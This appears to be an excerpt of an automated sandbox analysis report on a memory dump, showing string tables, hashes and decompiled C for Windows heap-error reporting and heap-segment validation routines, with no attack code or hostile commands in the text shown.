The instruction at %p tried to %s , xrefs: 0109B4B6
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0109B3D6
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0109B38F
*** enter .exr %p for the exception record, xrefs: 0109B4F1
The critical section is owned by thread %p., xrefs: 0109B3B9
*** enter .cxr %p for the context, xrefs: 0109B50D
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0109B47D
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0109B305
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0109B484
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0109B2DC
The instruction at %p referenced memory at %p., xrefs: 0109B432
*** Inpage error in %ws:%s, xrefs: 0109B418
write to, xrefs: 0109B4A6
This failed because of error %Ix., xrefs: 0109B446
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0109B53F
<unknown>, xrefs: 0109B27E, 0109B2D1, 0109B350, 0109B399, 0109B417, 0109B48E
a NULL pointer, xrefs: 0109B4E0
The resource is owned shared by %d threads, xrefs: 0109B37E
an invalid address, %p, xrefs: 0109B4CF
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 0109B39B
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0109B323
Go determine why that thread has not released the critical section., xrefs: 0109B3C5
*** then kb to get the faulting stack, xrefs: 0109B51C
The resource is owned exclusively by thread %p, xrefs: 0109B374
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0109B476
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0109B314
*** An Access Violation occurred in %ws:%s, xrefs: 0109B48F
*** Resource timeout (%p) in %ws:%s, xrefs: 0109B352

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: e4ae9e31c929a91e41132296ce40512f22bf8ab588279936a5b1937070ee35f8
Instruction ID: 456981eda588d109beb15d67dbb1126519e2c845e8440bd8a6eff6dae8def42e
Opcode Fuzzy Hash: e4ae9e31c929a91e41132296ce40512f22bf8ab588279936a5b1937070ee35f8
Instruction Fuzzy Hash: 40810375A40200FFDF21AB09AC95EAF3B76FF56B62F498085F5841B252D761C401FAB2

Uniqueness

Uniqueness Score: -1.00%

Function 010A1C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E010A1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0xfc48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00FEB150();
				} else {
					E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x10d589c);
				E00FEB150("Heap error detected at %p (heap handle %p)\n",  *0x10d58a0);
				_t27 =  *0x10d5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M010A1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00FEB150();
				} else {
					E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E00FEB150("Error code: %d - %s\n",  *0x10d5898);
				_t113 =  *0x10d58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00FEB150();
					} else {
						E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00FEB150("Parameter1: %p\n",  *0x10d58a4);
				}
				_t115 =  *0x10d58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00FEB150();
					} else {
						E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00FEB150("Parameter2: %p\n",  *0x10d58a8);
				}
				_t117 =  *0x10d58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00FEB150();
					} else {
						E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00FEB150("Parameter3: %p\n",  *0x10d58ac);
				}
				_t119 =  *0x10d58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00FEB150();
					} else {
						E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x10d58b4);
					E00FEB150("Last known valid blocks: before - %p, after - %p\n",  *0x10d58b0);
				} else {
					_t120 =  *0x10d58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00FEB150();
				} else {
					E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E00FEB150("Stack trace available at %p\n", 0x10d58c0);
			}

0x010a1c10
0x010a1c16
0x010a1c1e
0x010a1c3d
0x010a1c3e
0x010a1c20
0x010a1c35
0x010a1c3a
0x010a1c44
0x010a1c55
0x010a1c5a
0x010a1c65
0x010a1c67
0x00000000
0x010a1c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x010a1c67
0x010a1cdc
0x010a1ce5
0x010a1d04
0x010a1d05
0x010a1ce7
0x010a1cfc
0x010a1d01
0x010a1d0b
0x010a1d17
0x010a1d1f
0x010a1d25
0x010a1d30
0x010a1d4f
0x010a1d50
0x010a1d32
0x010a1d47
0x010a1d4c
0x010a1d61
0x010a1d67
0x010a1d68
0x010a1d6e
0x010a1d79
0x010a1d98
0x010a1d99
0x010a1d7b
0x010a1d90
0x010a1d95
0x010a1daa
0x010a1db0
0x010a1db1
0x010a1db7
0x010a1dc2
0x010a1de1
0x010a1de2
0x010a1dc4
0x010a1dd9
0x010a1dde
0x010a1df3
0x010a1df9
0x010a1dfa
0x010a1e00
0x010a1e0a
0x010a1e13
0x010a1e32
0x010a1e33
0x010a1e15
0x010a1e2a
0x010a1e2f
0x010a1e39
0x010a1e4a
0x010a1e02
0x010a1e02
0x010a1e08
0x00000000
0x00000000
0x010a1e08
0x010a1e5b
0x010a1e7a
0x010a1e7b
0x010a1e5d
0x010a1e72
0x010a1e77
0x010a1e95

Strings

heap_failure_buffer_underrun, xrefs: 010A1C9F
heap_failure_internal, xrefs: 010A1C6E
heap_failure_invalid_argument, xrefs: 010A1CAD
heap_failure_listentry_corruption, xrefs: 010A1CD0
Heap error detected at %p (heap handle %p), xrefs: 010A1C50
Error code: %d - %s, xrefs: 010A1D12
heap_failure_invalid_allocation_type, xrefs: 010A1CB4
Parameter1: %p, xrefs: 010A1D5C
heap_failure_cross_heap_operation, xrefs: 010A1CC2
Stack trace available at %p, xrefs: 010A1E86
Parameter3: %p, xrefs: 010A1DEE
heap_failure_virtual_block_corruption, xrefs: 010A1C91
HEAP: , xrefs: 010A1C16, 010A1C3D, 010A1D04, 010A1D4F, 010A1D98, 010A1DE1, 010A1E32, 010A1E7A
heap_failure_unknown, xrefs: 010A1C75
heap_failure_freelists_corruption, xrefs: 010A1CC9
heap_failure_lfh_bitmap_mismatch, xrefs: 010A1CD7
heap_failure_multiple_entries_corruption, xrefs: 010A1C8A
heap_failure_buffer_overrun, xrefs: 010A1C98
heap_failure_block_not_busy, xrefs: 010A1CA6
heap_failure_entry_corruption, xrefs: 010A1C83
HEAP[%wZ]: , xrefs: 010A1C30, 010A1CF7, 010A1D42, 010A1D8B, 010A1DD4, 010A1E25, 010A1E6D
heap_failure_usage_after_free, xrefs: 010A1CBB
Last known valid blocks: before - %p, after - %p, xrefs: 010A1E45
heap_failure_generic, xrefs: 010A1C7C
Parameter2: %p, xrefs: 010A1DA5

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 7f62e3a7677f3e2dff62f09ea9661ac2898729fa00aa556d9cb78ef55597d745
Instruction ID: 386d647f9bf340cc0f79b20e3492c45b47a87ffbd384c7b80e8ec8992e690b61
Opcode Fuzzy Hash: 7f62e3a7677f3e2dff62f09ea9661ac2898729fa00aa556d9cb78ef55597d745
Instruction Fuzzy Hash: 3661B03651A185DFD311BBC9E896E2573A5EB04B70F4D807FF949AF352C63C9840AB0A

Uniqueness

Uniqueness Score: -1.00%

Function 010A4AEF, Relevance: 11.8, Strings: 9, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 59%

			E010A4AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t189;
				intOrPtr _t191;
				intOrPtr _t210;
				signed int _t225;
				signed char _t231;
				intOrPtr _t232;
				unsigned int _t245;
				intOrPtr _t249;
				intOrPtr _t259;
				signed int _t281;
				signed int _t283;
				intOrPtr _t284;
				signed int _t288;
				signed int* _t294;
				signed int* _t298;
				intOrPtr* _t299;
				intOrPtr* _t300;
				signed int _t307;
				signed int _t309;
				signed short _t312;
				signed short _t315;
				signed int _t317;
				signed int _t320;
				signed int _t322;
				signed int _t326;
				signed int _t327;
				void* _t328;
				signed int _t332;
				signed int _t340;
				signed int _t342;
				signed char _t344;
				signed int* _t345;
				void* _t346;
				signed char _t352;
				signed char _t367;
				signed int _t374;
				intOrPtr* _t378;
				signed int _t380;
				signed int _t385;
				signed char _t390;
				unsigned int _t392;
				signed char _t395;
				unsigned int _t397;
				intOrPtr* _t400;
				signed int _t402;
				signed int _t405;
				intOrPtr* _t406;
				signed int _t407;
				intOrPtr _t412;
				void* _t414;
				signed int _t415;
				signed int _t416;
				signed int _t429;

				_v16 = _v16 & 0x00000000;
				_t189 = 0;
				_v8 = _v8 & 0;
				_t332 = __edx;
				_v12 = 0;
				_t414 = __ecx;
				_t415 = __edx;
				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
					L88:
					_t416 = _v16;
					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
							L107:
							return 1;
						}
						_t191 =  *[fs:0x30];
						__eflags =  *(_t191 + 0xc);
						if( *(_t191 + 0xc) == 0) {
							_push("HEAP: ");
							E00FEB150();
						} else {
							E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v12);
						_push( *((intOrPtr*)(_t332 + 0x30)));
						_push(_t332);
						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
						L122:
						E00FEB150();
						L119:
						return 0;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E00FEB150();
					} else {
						E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t416);
					_push( *((intOrPtr*)(_t332 + 0x2c)));
					_push(_t332);
					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
					goto L122;
				} else {
					goto L1;
				}
				do {
					L1:
					 *_a16 = _t415;
					if( *(_t414 + 0x4c) != 0) {
						_t392 =  *(_t414 + 0x50) ^  *_t415;
						 *_t415 = _t392;
						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
						_t424 = _t392 >> 0x18 - _t352;
						if(_t392 >> 0x18 != _t352) {
							_push(_t352);
							E0109FA2B(_t332, _t414, _t415, _t414, _t415, _t424);
						}
					}
					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
						_t210 =  *[fs:0x30];
						__eflags =  *(_t210 + 0xc);
						if( *(_t210 + 0xc) == 0) {
							_push("HEAP: ");
							E00FEB150();
						} else {
							E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v8 & 0x0000ffff);
						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
						__eflags = _t340;
						_push(_t340);
						E00FEB150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
						L117:
						__eflags =  *(_t414 + 0x4c);
						if( *(_t414 + 0x4c) != 0) {
							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
							__eflags =  *_t415;
						}
						goto L119;
					}
					_t225 =  *_t415 & 0x0000ffff;
					_t390 =  *(_t415 + 2);
					_t342 = _t225;
					_v8 = _t342;
					_v20 = _t342;
					_v28 = _t225 << 3;
					if((_t390 & 0x00000001) == 0) {
						__eflags =  *(_t414 + 0x40) & 0x00000040;
						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
						__eflags = _t344 & 0x00000001;
						if((_t344 & 0x00000001) == 0) {
							L66:
							_t345 = _a12;
							 *_a8 =  *_a8 + 1;
							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
							__eflags =  *_t345;
							L67:
							_t231 =  *(_t415 + 6);
							if(_t231 == 0) {
								_t346 = _t414;
							} else {
								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
							}
							if(_t346 != _t332) {
								_t232 =  *[fs:0x30];
								__eflags =  *(_t232 + 0xc);
								if( *(_t232 + 0xc) == 0) {
									_push("HEAP: ");
									E00FEB150();
								} else {
									E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t415 + 6) & 0x000000ff);
								_push(_t415);
								_push("Heap block at %p has incorrect segment offset (%x)\n");
								goto L95;
							} else {
								if( *((char*)(_t415 + 7)) != 3) {
									__eflags =  *(_t414 + 0x4c);
									if( *(_t414 + 0x4c) != 0) {
										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										__eflags =  *_t415;
									}
									_t415 = _t415 + _v28;
									__eflags = _t415;
									goto L86;
								}
								_t245 =  *(_t415 + 0x1c);
								if(_t245 == 0) {
									_t395 =  *_t415 & 0x0000ffff;
									_v6 = _t395 >> 8;
									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
										__eflags =  *(_t414 + 0x4c);
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											__eflags =  *_t415;
										}
										goto L107;
									}
									_t249 =  *[fs:0x30];
									__eflags =  *(_t249 + 0xc);
									if( *(_t249 + 0xc) == 0) {
										_push("HEAP: ");
										E00FEB150();
									} else {
										E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_push( *((intOrPtr*)(_t332 + 0x28)));
									_push(_t415);
									_push("Heap block at %p is not last block in segment (%p)\n");
									L95:
									E00FEB150();
									goto L117;
								}
								_v12 = _v12 + 1;
								_v16 = _v16 + (_t245 >> 0xc);
								if( *(_t414 + 0x4c) != 0) {
									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
								}
								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
									L82:
									_v8 = _v8 & 0x00000000;
									goto L86;
								} else {
									if( *(_t414 + 0x4c) != 0) {
										_t397 =  *(_t414 + 0x50) ^  *_t415;
										 *_t415 = _t397;
										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
										_t442 = _t397 >> 0x18 - _t367;
										if(_t397 >> 0x18 != _t367) {
											_push(_t367);
											E0109FA2B(_t332, _t414, _t415, _t414, _t415, _t442);
										}
									}
									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
										_t259 =  *[fs:0x30];
										__eflags =  *(_t259 + 0xc);
										if( *(_t259 + 0xc) == 0) {
											_push("HEAP: ");
											E00FEB150();
										} else {
											E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
										_push(_t415);
										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
										goto L95;
									} else {
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										}
										goto L82;
									}
								}
							}
						}
						_t281 = _v28 + 0xfffffff0;
						_v24 = _t281;
						__eflags = _t390 & 0x00000002;
						if((_t390 & 0x00000002) != 0) {
							__eflags = _t281 - 4;
							if(_t281 > 4) {
								_t281 = _t281 - 4;
								__eflags = _t281;
								_v24 = _t281;
							}
						}
						__eflags = _t390 & 0x00000008;
						if((_t390 & 0x00000008) == 0) {
							_t102 = _t415 + 0x10; // -8
							_t283 = E0103D540(_t102, _t281, 0xfeeefeee);
							_v20 = _t283;
							__eflags = _t283 - _v24;
							if(_t283 != _v24) {
								_t284 =  *[fs:0x30];
								__eflags =  *(_t284 + 0xc);
								if( *(_t284 + 0xc) == 0) {
									_push("HEAP: ");
									E00FEB150();
								} else {
									E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t288 = _v20 + 8 + _t415;
								__eflags = _t288;
								_push(_t288);
								_push(_t415);
								_push("Free Heap block %p modified at %p after it was freed\n");
								goto L95;
							}
							goto L66;
						} else {
							_t374 =  *(_t415 + 8);
							_t400 =  *((intOrPtr*)(_t415 + 0xc));
							_v24 = _t374;
							_v28 = _t400;
							_t294 =  *(_t374 + 4);
							__eflags =  *_t400 - _t294;
							if( *_t400 != _t294) {
								L64:
								_push(_t374);
								_push( *_t400);
								_t101 = _t415 + 8; // -16
								E010AA80D(_t414, 0xd, _t101, _t294);
								goto L86;
							}
							_t56 = _t415 + 8; // -16
							__eflags =  *_t400 - _t56;
							_t374 = _v24;
							if( *_t400 != _t56) {
								goto L64;
							}
							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
							_t402 =  *(_t414 + 0xb4);
							__eflags = _t402;
							if(_t402 == 0) {
								L35:
								_t298 = _v28;
								 *_t298 = _t374;
								 *(_t374 + 4) = _t298;
								__eflags =  *(_t415 + 2) & 0x00000008;
								if(( *(_t415 + 2) & 0x00000008) == 0) {
									L39:
									_t377 =  *_t415 & 0x0000ffff;
									_t299 = _t414 + 0xc0;
									_v28 =  *_t415 & 0x0000ffff;
									 *(_t415 + 2) = 0;
									 *((char*)(_t415 + 7)) = 0;
									__eflags =  *(_t414 + 0xb4);
									if( *(_t414 + 0xb4) == 0) {
										_t378 =  *_t299;
									} else {
										_t378 = E0100E12C(_t414, _t377);
										_t299 = _t414 + 0xc0;
									}
									__eflags = _t299 - _t378;
									if(_t299 == _t378) {
										L51:
										_t300 =  *((intOrPtr*)(_t378 + 4));
										__eflags =  *_t300 - _t378;
										if( *_t300 != _t378) {
											_push(_t378);
											_push( *_t300);
											__eflags = 0;
											E010AA80D(0, 0xd, _t378, 0);
										} else {
											_t87 = _t415 + 8; // -16
											_t406 = _t87;
											 *_t406 = _t378;
											 *((intOrPtr*)(_t406 + 4)) = _t300;
											 *_t300 = _t406;
											 *((intOrPtr*)(_t378 + 4)) = _t406;
										}
										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
										_t405 =  *(_t414 + 0xb4);
										__eflags = _t405;
										if(_t405 == 0) {
											L61:
											__eflags =  *(_t414 + 0x4c);
											if(__eflags != 0) {
												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											}
											goto L86;
										} else {
											_t380 =  *_t415 & 0x0000ffff;
											while(1) {
												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
													break;
												}
												_t307 =  *_t405;
												__eflags = _t307;
												if(_t307 == 0) {
													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
													L60:
													_t94 = _t415 + 8; // -16
													E0100E4A0(_t414, _t405, 1, _t94, _t309, _t380);
													goto L61;
												}
												_t405 = _t307;
											}
											_t309 = _t380;
											goto L60;
										}
									} else {
										_t407 =  *(_t414 + 0x4c);
										while(1) {
											__eflags = _t407;
											if(_t407 == 0) {
												_t312 =  *(_t378 - 8) & 0x0000ffff;
											} else {
												_t315 =  *(_t378 - 8);
												_t407 =  *(_t414 + 0x4c);
												__eflags = _t315 & _t407;
												if((_t315 & _t407) != 0) {
													_t315 = _t315 ^  *(_t414 + 0x50);
													__eflags = _t315;
												}
												_t312 = _t315 & 0x0000ffff;
											}
											__eflags = _v28 - (_t312 & 0x0000ffff);
											if(_v28 <= (_t312 & 0x0000ffff)) {
												goto L51;
											}
											_t378 =  *_t378;
											__eflags = _t414 + 0xc0 - _t378;
											if(_t414 + 0xc0 != _t378) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
								}
								_t317 = E0100A229(_t414, _t415);
								__eflags = _t317;
								if(_t317 != 0) {
									goto L39;
								}
								E0100A309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
								goto L86;
							}
							_t385 =  *_t415 & 0x0000ffff;
							while(1) {
								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
									break;
								}
								_t320 =  *_t402;
								__eflags = _t320;
								if(_t320 == 0) {
									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
									L34:
									_t63 = _t415 + 8; // -16
									E0100BC04(_t414, _t402, 1, _t63, _t322, _t385);
									_t374 = _v24;
									goto L35;
								}
								_t402 = _t320;
							}
							_t322 = _t385;
							goto L34;
						}
					}
					if(_a20 == 0) {
						L18:
						if(( *(_t415 + 2) & 0x00000004) == 0) {
							goto L67;
						}
						if(E010923E3(_t414, _t415) == 0) {
							goto L117;
						}
						goto L67;
					} else {
						if((_t390 & 0x00000002) == 0) {
							_t326 =  *(_t415 + 3) & 0x000000ff;
						} else {
							_t328 = E00FE1F5B(_t415);
							_t342 = _v20;
							_t326 =  *(_t328 + 2) & 0x0000ffff;
						}
						_t429 = _t326;
						if(_t429 == 0) {
							goto L18;
						}
						if(_t429 >= 0) {
							__eflags = _t326 & 0x00000800;
							if(__eflags != 0) {
								goto L18;
							}
							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
							if(__eflags >= 0) {
								goto L18;
							}
							_t412 = _a20;
							_t327 = _t326 & 0x0000ffff;
							L17:
							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
							goto L18;
						}
						_t327 = _t326 & 0x00007fff;
						if(_t327 >= 0x81) {
							goto L18;
						}
						_t412 = _a24;
						goto L17;
					}
					L86:
				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
				_t189 = _v12;
				goto L88;
			}

0x010a4af7
0x010a4afb
0x010a4afd
0x010a4b01
0x010a4b03
0x010a4b08
0x010a4b0a
0x010a4b0f
0x010a4eb5
0x010a4eb5
0x010a4ebb
0x010a50d5
0x010a50d8
0x010a4ff6
0x00000000
0x010a4ff6
0x010a50de
0x010a50e4
0x010a50e8
0x010a5107
0x010a510c
0x010a50ea
0x010a50ff
0x010a5104
0x010a5112
0x010a5115
0x010a5118
0x010a5119
0x010a50cb
0x010a50cb
0x010a50af
0x00000000
0x010a50af
0x010a4ecb
0x010a50b6
0x010a50bb
0x010a4ed1
0x010a4ee6
0x010a4eeb
0x010a50c1
0x010a50c2
0x010a50c5
0x010a50c6
0x00000000
0x00000000
0x00000000
0x00000000
0x010a4b15
0x010a4b15
0x010a4b1c
0x010a4b1e
0x010a4b23
0x010a4b27
0x010a4b33
0x010a4b38
0x010a4b3a
0x010a4b3c
0x010a4b41
0x010a4b41
0x010a4b3a
0x010a4b52
0x010a5045
0x010a504b
0x010a504f
0x010a506e
0x010a5073
0x010a5051
0x010a5066
0x010a506b
0x010a5083
0x010a5088
0x010a5088
0x010a508a
0x010a5091
0x010a5099
0x010a5099
0x010a509d
0x010a50a7
0x010a50ad
0x010a50ad
0x010a50ad
0x00000000
0x010a509d
0x010a4b58
0x010a4b5b
0x010a4b5e
0x010a4b63
0x010a4b66
0x010a4b69
0x010a4b6f
0x010a4be4
0x010a4bf0
0x010a4bf2
0x010a4bf5
0x010a4dc3
0x010a4dc6
0x010a4dc9
0x010a4dce
0x010a4dce
0x010a4dd0
0x010a4dd0
0x010a4dd5
0x010a4def
0x010a4dd7
0x010a4de7
0x010a4de7
0x010a4df3
0x010a5001
0x010a5007
0x010a500b
0x010a502a
0x010a502f
0x010a500d
0x010a5022
0x010a5027
0x010a5039
0x010a503a
0x010a503b
0x00000000
0x010a4df9
0x010a4dfd
0x010a4e90
0x010a4e94
0x010a4e9e
0x010a4ea4
0x010a4ea4
0x010a4ea4
0x010a4ea6
0x010a4ea6
0x00000000
0x010a4ea6
0x010a4e03
0x010a4e08
0x010a4f88
0x010a4f92
0x010a4f99
0x010a4f9c
0x010a4fe0
0x010a4fe4
0x010a4fee
0x010a4ff4
0x010a4ff4
0x010a4ff4
0x00000000
0x010a4fe4
